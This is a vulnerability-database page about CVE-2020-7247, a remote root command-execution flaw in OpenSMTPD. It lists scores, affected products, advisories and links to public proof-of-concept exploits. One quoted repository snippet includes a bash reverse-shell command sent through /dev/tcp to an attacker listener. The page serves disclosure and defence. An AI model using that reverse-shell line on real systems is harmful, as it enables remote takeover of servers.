Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9.8
CVSSv3

CVE-2020-7247

Published: 29/01/2020 Updated: 07/11/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 893
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Openbsd

Vulnerability Summary

smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote malicious users to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

openbsd opensmtpd 6.6

debian debian linux 9.0

debian debian linux 10.0

fedoraproject fedora 32

canonical ubuntu linux 18.04

canonical ubuntu linux 19.10

Vendor Advisories

Ubuntu Security Notice: OpenSMTPD vulnerability
OpenSMTPD could be made to run programs as root if it received specially crafted input over the network ...
Debian Security Advisories: DSA-4611-1 opensmtpd -- security update
Qualys discovered that the OpenSMTPD SMTP server performed insufficient validation of email addresses which could result in the execution of arbitrary commands as root In addition this update fixes a denial of service by triggering an opportunistic TLS downgrade For the oldstable distribution (stretch), these problems have been fixed in version 6 ...
Arch Linux Issues:
A vulnerability was discovered in OpenSMTPd before version 662 which allows arbiterary code execution by constructing a mail FROM address that escapes the regex filter ...

Exploits

Exploit DB: OpenBSD OpenSMTPD Privilege Escalation / Code Execution
Qualys discovered a vulnerability in OpenSMTPD, OpenBSD's mail server This vulnerability is exploitable since May 2018 (commit a8e222352f, "switch smtpd to new grammar") and allows an attacker to execute arbitrary shell commands, as root ...
Exploit DB: OpenBSD OpenSMTPD 6.6 Remote Code Execution
smtp_mailaddr in smtp_sessionc in OpenSMTPD version 66, as used in OpenBSD version 66 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field This affects the "uncommented" default configuration The issue exists because of an inco ...
Exploit DB: OpenSMTPD 6.6.1 Local Privilege Escalation
smtp_mailaddr in smtp_sessionc in OpenSMTPD 66, as used in OpenBSD 66 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell meta-characters in a MAIL FROM field This affects the "uncommented" default configuration The issue exists because of an incorrect return va ...
Exploit DB: OpenSMTPD 6.6.2 Remote Code Execution
OpenSMTPD version 662 remote code execution exploit ...

Mailing Lists

Full Disclosure: LPE and RCE in OpenSMTPD (CVE-2020-7247)
<!--X-Body-Begin--> <!--X-User-Header--> Full Disclosure mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> LPE and RCE in OpenSMTPD (CVE-2020-7247) <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: Qualys Security ...
Full Disclosure: LPE and RCE in OpenSMTPD (CVE-2020-7247)
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> LPE and RCE in OpenSMTPD (CVE-2020-7247) <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: Qualys Security Advisory ...

Github Repositories

https://github.com/QTranspose/CVE-2020-7247-exploit

OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit

CVE-2020-7247-exploit OpenSMTPD 640 - 661 Remote Code Execution PoC exploit Reference: wwwopenwallcom/lists/oss-security/2020/01/28/3 Usage python3 exploitpy &lt;target_host&gt; &lt;target_port&gt; &lt;reverse_host&gt; &lt;reverse_port&gt; &lt;recipient_email&gt; Dependencies pip3 in

https://github.com/FiroSolutions/cve-2020-7247-exploit

Python exploit of cve-2020-7247

cve-2020-7247-exploit Python exploit of cve-2020-7247 Read about the vulnerability: blogfirosolutionscom/exploits/opensmtpd-remote-vulnerability/

https://github.com/r0lh/CVE-2020-7247

Proof Of Concept Exploit for CVE-2020-7247 (Remote Execution on OpenSMTPD < 6.6.2

CVE-2020-7247 Proof Of Concept Exploit for CVE-2020-7247 (Remote Execution on OpenSMTPD &lt; 662) OpenSMTPD &lt; 662 wwwcvedetailscom/cve/CVE-2020-7247 tested on: OpenBSD 66 credits to Marco Ivaldi raptor@0xdeadbeefinfo for payload Usage (remote) $ go run CVE-2020-7247go -u 19216802 -p 25 -d exampleorg [change nc listener in source code if you are n

https://github.com/f4T1H21/CVE-2020-7247

PoC exploit for CVE-2020-7247 OpenSMTPD 6.4.0 < 6.6.1 Remote Code Execution

CVE 2020-7247 PoC exploit for OpenSMTPD 640 &lt; 661 - Remote Code Execution, written by f4T1H, inspired by QTranspose Reference: wwwqualyscom/2020/01/28/cve-2020-7247/lpe-rce-opensmtpdtxt Dependencies: pip3 install pwntools Usage: python3 exploitpy &lt;RHOST&gt; &lt;RPORT&gt; &lt;recipient_mail&

https://github.com/SimonSchoeni/CVE-2020-7247-POC

Proof of concept for CVE-2020-7247 for educational purposes.

Foreword Key facts about the exploit Installing the vulnerable server Configuration Environment disclaimers Exploit Manual Exploitation Scripted Exploitation Foreword This repository should serve as a base to set up and exploit CVE-2020-7247 in a controlled and private environment All of the published code and configuration is solely ment for testing this vulnerability

https://github.com/M4chin3M4N/SMTPython

smtp exploit script

SMTPython smtp exploit script CVE-2020-7247 RemoteCodeExecution usage: /SMTPythonpy name@host example: /SMTPythonpy 19216804 25 'bash -c "exec bash -i &amp;&gt; /dev/tcp/1921681104 4444 &lt;&amp;1"' user@ubuntu

https://github.com/superzerosec/cve-2020-7247

OpenSMTPD version 6.6.2 remote code execution exploit

cve-2020-7247 Exploit Title: OpenSMTPD 662 - Remote Code Execution The new Date: 2020-01-29 Exploit Author: 1F98D Original Author: Qualys Security Advisory Vendor Homepage: wwwopensmtpdorg/ Software Link: githubcom/OpenSMTPD/OpenSMTPD/releases/tag/661p1 Version: OpenSMTPD &lt; 662 Tested on: OpenBSD 66, OpenBSD 65, OpenBSD 64, OpenBSD 59

https://github.com/DarkRelay-Security-Labs/vulnlab_aws

Terraform script to deploy vulnerable pentest lab on AWS.

Private Pentest Lab on AWS Terraform script to deploy below vulnerable container targets on AWS Juice-shop: hubdockercom/r/bkimminich/juice-shop DVWA: hubdockercom/r/vulnerables/web-dvwa XVWA: hubdockercom/r/bitnetsecdave/xvwa Vulnerable Graphql: Damn-Vulnerable-GraphQL-Application Vulnerable API: githubcom/erev0s/VAmPI Vulnerable SMB: ht

https://github.com/f4T1H21/HackTheBox-Writeups

Hack The Box writeups by Şefik Efe.

Hack The Box Writeups by Şefik Efe Would you like to give me stars in Hack The Box? Thanks in advance :) I'll be posting retired boxes' and some challenges' writeups You can search keywords and/or topics between writeups using top left corner search bar Index Table My favourite writeup so far: Breadcrumbs &nbsp;&nbsp;&nbsp;&nbsp;&a

Recent Articles

Anatomy of OpenBSD's OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage
The Register • Shaun Nichols in San Francisco • 30 Jan 2020

Function accidentally returns OK instead of no-way

Code dive The OpenBSD project's OpenSMTPD can be potentially hijacked by a maliciously crafted incoming email. Infosec biz Qualys discovered and this week disclosed CVE-2020-7247, a root privilege-escalation and remote code execution flaw in OpenSMTPD. It can be exploited locally by a normal user to execute shell commands as root, if using the daemon's default configuration, or locally and remotely if the daemon is using its "uncommented" default configuration, in which it listens on all interfa...

Read more...

References

CWE-78CWE-755https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45http://www.openwall.com/lists/oss-security/2020/01/28/3https://www.openbsd.org/security.htmlhttp://packetstormsecurity.com/files/156137/OpenBSD-OpenSMTPD-Privilege-Escalation-Code-Execution.htmlhttps://seclists.org/bugtraq/2020/Jan/51https://www.debian.org/security/2020/dsa-4611http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.htmlhttps://www.kb.cert.org/vuls/id/390745http://seclists.org/fulldisclosure/2020/Jan/49http://packetstormsecurity.com/files/156249/OpenSMTPD-MAIL-FROM-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156295/OpenSMTPD-6.6.1-Local-Privilege-Escalation.htmlhttps://usn.ubuntu.com/4268-1/http://packetstormsecurity.com/files/162093/OpenBSD-OpenSMTPD-6.6-Remote-Code-Execution.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OPH4QU4DNVHA7ACFXMYFCEP5PSXXPN4E/https://usn.ubuntu.com/4268-1/https://nvd.nist.govhttps://www.kb.cert.org/vuls/id/390745
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4040privilege escalationCVE-2024-4112CVE-2024-32872man-in-the-middleCVE-2024-32788bypassCVE-2024-3400CVE-2024-28976
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook